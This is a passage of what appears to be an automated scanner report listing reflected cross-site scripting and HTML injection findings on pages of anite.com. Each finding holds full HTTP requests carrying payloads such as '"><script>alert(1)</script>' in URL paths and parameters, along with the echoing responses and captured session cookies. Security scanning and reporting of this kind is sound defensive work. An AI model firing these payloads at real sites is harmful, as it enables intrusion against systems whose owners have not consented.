Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:16:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:16:56 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/investors-share-price-3.html?Itemid=46823398"><a>04285f2b500#up">
...[SNIP]...

1.118. http://anite.com/investors-share-price-3.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/investors-share-price-3.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a650"><script>alert(1)</script>e12ab518e5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2a650"><script>alert(1)</script>e12ab518e5 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:17:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:17:11 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/2a650"><script>alert(1)</script>e12ab518e5#up">
...[SNIP]...

1.119. http://anite.com/investors-share-price-3.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/investors-share-price-3.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3656f"><a>4da6f37c359 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /investors-share-price-3.html?3656f"><a>4da6f37c359=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:16:52 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:16:52 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/investors-share-price-3.html?3656f"><a>4da6f37c359=1#up">
...[SNIP]...

1.120. http://anite.com/investors-shareholder-support-3.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/investors-shareholder-support-3.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63a6c"><a>f7cb52203f was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /investors-shareholder-support-3.html?Itemid=47263a6c"><a>f7cb52203f HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:16:50 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:16:51 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/investors-shareholder-support-3.html?Itemid=47263a6c"><a>f7cb52203f#up">
...[SNIP]...

1.121. http://anite.com/investors-shareholder-support-3.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/investors-shareholder-support-3.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8faf7"><script>alert(1)</script>500db7c7f02 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /8faf7"><script>alert(1)</script>500db7c7f02 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:17:01 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:17:01 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/8faf7"><script>alert(1)</script>500db7c7f02#up">
...[SNIP]...

1.122. http://anite.com/investors-shareholder-support-3.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/investors-shareholder-support-3.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 199be"><a>793a0fe01dd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /investors-shareholder-support-3.html?199be"><a>793a0fe01dd=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:16:42 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:16:42 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/investors-shareholder-support-3.html?199be"><a>793a0fe01dd=1#up">
...[SNIP]...

1.123. http://anite.com/js/jquery-1.3.2.min.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/js/jquery-1.3.2.min.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8724"><script>alert(1)</script>886577671f8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/a8724"><script>alert(1)</script>886577671f8 HTTP/1.1
Host: anite.com
Proxy-Connection: keep-alive
Referer: http://anite.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:08:05 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:08:05 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30261

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/js/a8724"><script>alert(1)</script>886577671f8#up">
...[SNIP]...

1.124. http://anite.com/js/jquery.hoverIntent.minified.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/js/jquery.hoverIntent.minified.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74588"><script>alert(1)</script>af4dfa3dea6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/74588"><script>alert(1)</script>af4dfa3dea6 HTTP/1.1
Host: anite.com
Proxy-Connection: keep-alive
Referer: http://anite.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:07:58 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:07:59 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30261

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/js/74588"><script>alert(1)</script>af4dfa3dea6#up">
...[SNIP]...

1.125. http://anite.com/js/swfobject.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/js/swfobject.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42317"><script>alert(1)</script>6fd9bb857f1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/42317"><script>alert(1)</script>6fd9bb857f1 HTTP/1.1
Host: anite.com
Proxy-Connection: keep-alive
Referer: http://anite.com/wireless-solutions-2.html?Itemid=211
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmb=188041464

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:08:05 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:08:05 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30261

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/js/42317"><script>alert(1)</script>6fd9bb857f1#up">
...[SNIP]...

1.126. http://anite.com/long-term-evolution-lte-testing.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/long-term-evolution-lte-testing.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82ff3"><a>d84fd22134d was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /long-term-evolution-lte-testing.html?Itemid=493I82ff3"><a>d84fd22134d HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:09:12 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:09:12 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/long-term-evolution-lte-testing.html?Itemid=493I82ff3"><a>d84fd22134d#up">
...[SNIP]...

1.127. http://anite.com/long-term-evolution-lte-testing.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/long-term-evolution-lte-testing.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8aec"><script>alert(1)</script>ed0feb913bf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /f8aec"><script>alert(1)</script>ed0feb913bf HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:09:27 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:09:27 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/f8aec"><script>alert(1)</script>ed0feb913bf#up">
...[SNIP]...

1.128. http://anite.com/long-term-evolution-lte-testing.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/long-term-evolution-lte-testing.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d683c"><a>cbd9791b07c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /long-term-evolution-lte-testing.html?d683c"><a>cbd9791b07c=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:09:08 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:09:08 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/long-term-evolution-lte-testing.html?d683c"><a>cbd9791b07c=1#up">
...[SNIP]...

1.129. http://anite.com/lte-testing-nemo.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/lte-testing-nemo.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe130"><a>38fa718819d was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /lte-testing-nemo.html?Itemid=500fe130"><a>38fa718819d HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:09:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:09:44 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/lte-testing-nemo.html?Itemid=500fe130"><a>38fa718819d#up">
...[SNIP]...

1.130. http://anite.com/lte-testing-nemo.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/lte-testing-nemo.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1da1"><script>alert(1)</script>3b6b2583318 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /a1da1"><script>alert(1)</script>3b6b2583318 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:09:57 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:09:57 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/a1da1"><script>alert(1)</script>3b6b2583318#up">
...[SNIP]...

1.131. http://anite.com/lte-testing-nemo.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/lte-testing-nemo.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 606cd"><a>c8bdadd4024 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /lte-testing-nemo.html?606cd"><a>c8bdadd4024=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:09:38 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:09:38 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/lte-testing-nemo.html?606cd"><a>c8bdadd4024=1#up">
...[SNIP]...

1.132. http://anite.com/managed-infrastructure-anite.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/managed-infrastructure-anite.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91057"><script>alert(1)</script>e1eecbb3048 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /91057"><script>alert(1)</script>e1eecbb3048 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
